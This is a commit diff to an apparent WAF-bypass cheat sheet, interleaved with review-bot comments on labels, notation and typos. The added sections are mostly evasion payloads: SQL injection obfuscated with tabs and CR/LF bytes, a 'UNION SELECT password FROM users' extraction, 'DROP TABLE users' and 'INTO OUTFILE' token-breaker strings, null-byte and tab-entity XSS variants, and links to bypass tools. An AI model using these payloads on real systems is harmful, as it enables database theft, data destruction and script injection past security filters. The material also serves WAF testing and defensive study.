New tool and some bypass methodologies

This commit is contained in:
Infected Drake 2019-06-08 23:00:15 +05:30 committed by GitHub
parent b73e02019c
commit 22a5ab8d53
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23


@ -2426,7 +2426,7 @@ An exotic payload crafted:
$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf
```
__12. Random Tabs__
__12. Tabs and Line Feeds__
- Tabs often help to evade firewalls especially regex based ones.
- Tabs can help break firewall regex when the regex is expecting whitespaces and not tabs.
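Review bot: the heading is renamed to "Tabs and Line Feeds" but both bullets under it still talk only about tabs; add a bullet saying that carriage returns and line feeds (`%0A%0D`) are used in the same whitespace-substitution role, since the very next example, `http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3`, relies on them without any explanation of what `%0A%0D` is doing there. A reader skimming the section title would otherwise not connect the CR/LF bytes to the technique being described.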
@ -2434,13 +2434,30 @@ __Standard__: `<IMG SRC="javascript:alert();">`
__Bypassed__: `<IMG SRC=" javascript:alert();">`
__Variant__: `<IMG SRC=" jav ascri pt:alert ();">`
__Standard__: `http://test.com/test?id=1 union select 1,2,3`
__Standard__: `http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3`
__Standard__: `<iframe src=javascript:alert(1)></iframe>`
__Obfuscated__:
```
<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe>
```
__13. Obfuscation in Other Formats__
__13. Token Breakers__
- Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.
- Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
- However, the request must still remain valid while using token-breakers.
__Case__: Unknown Token for the Tokenizer
__Payload__: `?id=-sqlite_version() UNION SELECT password FROM users --`
__Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
__Payload 1__: `?id=123);DROP TABLE users --`
__Payload 2__: `?id=1337) INTO OUTFILE xxx --`
> __TIP:__ More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).
__14. Obfuscation in Other Formats__
- Many web applications support different encoding types and can interpret the encoding (see below).
- Obfuscating our payload to a format not supported by WAF but the server can smuggle our payload in.
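Review bot: the two example lines under section 12 are both labelled `__Standard__`; the second one (`http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3`) is the transformed form and should be labelled `__Bypassed__` to match the `__Standard__` / `__Bypassed__` / `__Variant__` convention used for the `<IMG SRC=...>` example directly above it. In the new "13. Token Breakers" section, the "Unknown Token for the Tokenizer" case gives a payload but never says which token is unknown; one sentence stating that `-sqlite_version()` is the part the tokenizer has no rule for would make the case self-explanatory, and the "However, the request must still remain valid" bullet would read better as a lead-in to the two cases rather than a trailing afterthought.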
@ -2581,6 +2598,9 @@ Payload examples:
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
```
__Standard__: `<a href="javascript:alert()">`
__Obfuscated__: `<a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>`
__Variant__: `<a 0x00 href="javascript:alert(1)">clickme</a>`
#### Parsing Bugs:
- RFC states that NodeNames cannot begin with whitespace.
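Review bot: the added `__Obfuscated__` and `__Variant__` lines use `0x09`, `0x0A`, `0x0D` and `0x00` spelled out as literal text inside the HTML (`ja0x09vas0x0A0x0Dcript`, `<a 0x00 href=...>`); typed as written, those are the four ASCII characters "0", "x", "0", "9", not a tab byte, so the examples do not work as copy-paste and the notation clashes with the `%09` / `%00` URL-encoding and `&Tab;` entity forms used elsewhere in this file (for example `<scri\x00pt>` and `%00` just above, and `&Tab;` in section 12). Either state explicitly that `0xNN` denotes a raw byte the reader must substitute, or rewrite the three lines with the same `%XX` encoding the surrounding examples use.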
@ -3186,6 +3206,7 @@ User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
### Evasion:
- [WAFNinja](https://github.com/khalilbijjou/wafninja) - A smart tool which fuzzes and can suggest bypasses for a given WAF by [@khalilbijjou](https://github.com/khalilbijjou/).
- [WAFTester](https://github.com/Raz0r/waftester) - Another tool which can obfuscate payloads to bypass WAFs by [@Raz0r](https://github.com/Raz0r/).
- [libinjection-fuzzer](https://github.com/migolovanov/libinjection-fuzzer) - A fizzer intended for finding `libinjection` bypasses but can be probably used universally.
- [bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history) - A tool which searches for old DNS records for finding actual site behind the WAF.
- [abuse-ssl-bypass-waf](https://github.com/LandGrey/abuse-ssl-bypass-waf) - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs.
- [SQLMap Tamper Scripts](https://github.com/sqlmapproject/sqlmap) - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs.
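Review bot: typo and word order in the new `libinjection-fuzzer` entry: "A fizzer intended for finding `libinjection` bypasses but can be probably used universally" should read "A fuzzer intended for finding `libinjection` bypasses but can probably be used universally". While here, the entry would be more useful to a defender if it named what `libinjection` is (the SQLi/XSS detection library embedded in several WAFs), since the other entries in this list each say which WAF surface the tool targets.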